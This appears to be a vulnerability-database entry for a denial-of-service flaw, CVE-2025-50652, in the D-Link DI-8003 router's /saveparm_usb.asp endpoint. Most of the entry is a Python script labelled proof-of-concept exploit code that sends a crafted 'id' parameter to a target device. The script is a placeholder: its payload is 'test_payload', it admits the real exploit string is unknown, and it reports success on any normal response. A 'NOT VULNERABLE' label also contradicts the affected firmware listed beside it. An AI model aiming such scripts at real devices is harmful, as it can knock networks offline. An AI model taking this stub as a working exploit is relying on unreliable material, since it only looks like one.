cpe:2.3:h:dlink:di-8003:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DI-8003 16.07.26A1
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
# CVE-2025-50652 PoC
# Target: D-Link DI-8003 16.07.26A1
# Endpoint: /saveparm_usb.asp
# Description: Improper handling of 'id' parameter leads to Denial of Service
target_url = "http://<TARGET_IP>/saveparm_usb.asp"
# Construct payload based on the vulnerability description
# The 'id' parameter is not handled correctly
payload = {
"id": "test_payload" # Replace with actual exploit string if known
}
try:
print(f"[+] Sending request to {target_url}...")
response = requests.get(target_url, params=payload, timeout=10)
if response.status_code == 200:
print("[+] Request sent successfully. Check device status for DoS.")
else:
print(f"[-] Unexpected status code: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] An error occurred: {e}")